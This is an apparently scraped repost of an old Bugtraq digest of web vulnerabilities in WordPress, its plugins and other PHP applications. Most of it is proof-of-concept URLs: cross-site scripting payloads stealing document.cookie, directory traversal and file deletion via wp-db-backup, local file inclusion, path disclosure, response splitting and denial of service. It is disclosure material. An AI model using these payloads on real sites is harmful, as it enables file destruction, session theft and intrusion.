securityvulns.com russian vulnerabilities digest wordpress 漏洞

简介: Dear bugtraq,  Below    is    a    digest    of    vulnerabilities    published    by  http://securityvulns.
Dear bugtraq,

  Below    is    a    digest    of    vulnerabilities    published    by
  http://securityvulns.com/ and believed to be previously unpublished in
  English.    All    vulnerabilities    were    reported   by   MustLive
  ( http://websecurity.com.ua/).

  1. AwesomeTemplateEngine Crossite scripting

  Multiple crossite scripting (require register_globvals):

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(d /
ocument.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.co /
okie)%3C/script%3E http://site/templates/example_template.php?data[table] [1][item]=%3C /
script%3Ealert(document.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[table] [1][url]=%22%3E%3Cscript%3Ealert /
(document.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document. /
cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument784.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1694/

  2. Wordpress multiple security vulnerabilities:

   2.1 information disclosure (WordPress 2.2/2.3)

    Invalid request disclosures database structure and local paths:

       http://site/?feed=rss2&p=1
  
    Original article (in Russian): http://securityvulns.ru/Sdocument663.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1634/
   
   2.2 crossite scripting (WordPress <= 2.0.9)

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document. /
cookie))%22 http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression /
(alert(document.cookie))%22

    Original article (in Russian): http://securityvulns.ru/Sdocument714.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1658/

   2.3  Directory  traversal, Arbitrary file deletion, Denial of Service
   and Cross-Site Scripting via wp-db-backup.php

   Directory Traversal (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess

   Arbitrary file deletion and DoS (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../index.php

   XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document. /
cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument755.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1676/

  2.4  Local  file include, Directory traversal and Full path disclosure
  (WordPress  <=  2.0.11  and potentially 2.1.x, 2.2.x, 2.3.x)

  Full path disclosure:

http://site/wp-admin/admin.php?import=/../../wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

  Local file include and Directory traversal:

http://site/wp-admin/admin.php?import=/../../file
http://site/wp-admin/themes.php?page=/../../file.php
http://site/wp-admin/themes.php?page=/../../.htaccess
http://site/wp-admin/edit.php?page=/../../file.php
http://site/wp-admin/edit.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../file.php
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/templates.php?page=/../../file.php
http://sites/wp-admin/templates.php?page=/../../.htaccess
http://site/wp-admin/edit-pages.php?page=/../../.htaccess
http://site/wp-admin/categories.php?page=/../../.htaccess
http://site/wp-admin/edit-comments.php?page=/../../.htaccess
http://site/wp-admin/moderation.php?page=/../../.htaccess
http://site/wp-admin/post.php?page=/../../.htaccess
http://site/wp-admin/page-new.php?page=/../../.htaccess
http://site/wp-admin/index.php?page=/../../file.php
http://site/wp-admin/index.php?page=/../../.htaccess
http://site/wp-admin/link-manager.php?page=/../../.htaccess
http://site/wp-admin/link-add.php?page=/../../.htaccess
http://site/wp-admin/link-categories.php?page=/../../.htaccess
http://site/wp-admin/link-import.php?page=/../../.htaccess
http://site/wp-admin/theme-editor.php?page=/../../.htaccess
http://site/wp-admin/plugin-editor.php?page=/../../.htaccess
http://site/wp-admin/profile.php?page=/../../.htaccess
http://site/wp-admin/users.php?page=/../../.htaccess
http://site/wp-admin/options-general.php?page=/../../.htaccess
http://site/wp-admin/options-writing.php?page=/../../.htaccess
http://site/wp-admin/options-reading.php?page=/../../.htaccess
http://site/wp-admin/options-discussion.php?page=/../../.htaccess
http://site/wp-admin/options-permalink.php?page=/../../.htaccess
http://site/wp-admin/options-misc.php?page=/../../.htaccess
http://site/wp-admin/import.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/bookmarklet.php?page=/../../.htaccess
http://site/wp-admin/cat-js.php?page=/../../.htaccess
http://site/wp-admin/inline-uploading.php?page=/../../.htaccess
http://site/wp-admin/options.php?page=/../../.htaccess
http://site/wp-admin/profile-update.php?page=/../../.htaccess
http://site/wp-admin/sidebar.php?page=/../../.htaccess
http://site/wp-admin/user-edit.php?page=/../../.htaccess

  Arbitrary file edit:

http://site/wp-admin/templates.php?file=/../../file

  Attacks with backslash are possible in Windows version.

  Original article (in Russian):
           http://securityvulns.ru/Sdocument762.html
           http://securityvulns.ru/Sdocument768.html
           http://securityvulns.ru/Sdocument773.html
           http://securityvulns.ru/Sdocument772.html
  Additional detail (in Ukrainian):
           http://websecurity.com.ua/1679/
           http://websecurity.com.ua/1683/
           http://websecurity.com.ua/1686/
           http://websecurity.com.ua/1687/


3. Crossite scripting and Denial of Service in PRO-Search <= 0.17

XSS:

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Original article (in Russian): http://securityvulns.ru/Sdocument731.html
Additional details (in Ukrainian): http://websecurity.com.ua/1259/

4.  Persistant  crossite scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)

POST request to

http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php

with different form fields.

Exploits:

          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html

Original article (in Russian):
          http://securityvulns.ru/Sdocument667.html
          http://securityvulns.ru/Sdocument546.html
Additional details (in Ukrainian):
          http://websecurity.com.ua/1641/
          http://websecurity.com.ua/1600/

5. RotaBanner Local <= 3 crossite scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E /


Original article (in Russian): http://securityvulns.ru/Sdocument625.html
Additional details (in Ukrainian): http://websecurity.com.ua/1442/


6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie) /
%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument472.html
Additional details (in Ukrainian): http://websecurity.com.ua/1454/

-=-=-=-

There  are  also  few vulnerabilities published in English as a part of
the Month of Bugs in CAPTCHA:

Cryptographp  <=  1.2  WordPress plugin multiple persistant crossite
scriptings

Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2

Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d

Original article: http://websecurity.com.ua/1588/



--
http://securityvulns.com/
         //_//
        { , . }     |/
+--oQQo->{ ^ }<-----+ /
> ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/
 
目录
相关文章
|
10月前
|
Web App开发 移动开发 安全
WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
362 1
|
2月前
|
存储 安全 前端开发
WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
134 0
|
SQL 安全 数据库
WordPress插件中的流行的严重错误发布的PoC漏洞
WordPress插件中的流行的严重错误发布的PoC漏洞
|
安全 PHP
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
182 0
|
SQL 安全 前端开发
网站漏洞检测 wordpress sql注入漏洞代码审计与修复
wordpress系统本身代码,很少出现sql注入漏洞,反倒是第三方的插件出现太多太多的漏洞,我们SINE安全发现,仅仅2019年9月份就出现8个插件漏洞,因为第三方开发的插件,技术都参差不齐,对安全方面也不是太懂导致写代码过程中没有对sql注入,以及xss跨站进行前端安全过滤,才导致发生sql注入漏洞。
411 0
网站漏洞检测 wordpress sql注入漏洞代码审计与修复
|
安全 关系型数据库 MySQL
网站漏洞修复对WordPress 致命漏洞注入shell
2019年正月刚开始,WordPress最新版本存在远程代码注入获取SHELL漏洞,该网站漏洞影响的版本是wordpress5.0.0,漏洞的产生是因为image模块导致的,因为代码里可以进行获取目录权限,以及文件包含功能,导致远程代码注入成功。
404 0
网站漏洞修复对WordPress 致命漏洞注入shell
|
SQL 弹性计算 安全
WordPress4.9 最新版本网站安全漏洞详情与修复
wordpress 目前互联网的市场占有率较高,许多站长以及建站公司都在使用这套开源的博客建站系统来设计网站,wordpress的优化以及html静态化,深受google以及搜索引擎的喜欢,全世界大约有着百分之28的网站都在使用这套系统,国外,外贸网站,个人博客使用的最多。
206 0
WordPress4.9 最新版本网站安全漏洞详情与修复
|
安全 数据库
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目
219 0
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
|
弹性计算 安全
阿里云提示wordpress IP验证不当漏洞手动处
登录阿里云后台 有漏洞安全修复提示,级别尽快修复,同时给出ECS服务器管理重要通知:您的云服务器(xxx.xx.xxx.xx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(UDP:ALL)的访问,阻断预计将在2018-04-23 09:56:58时间内结束,请及时进行安全自查。若有疑问,请工单或电话联系阿里云售后
236 0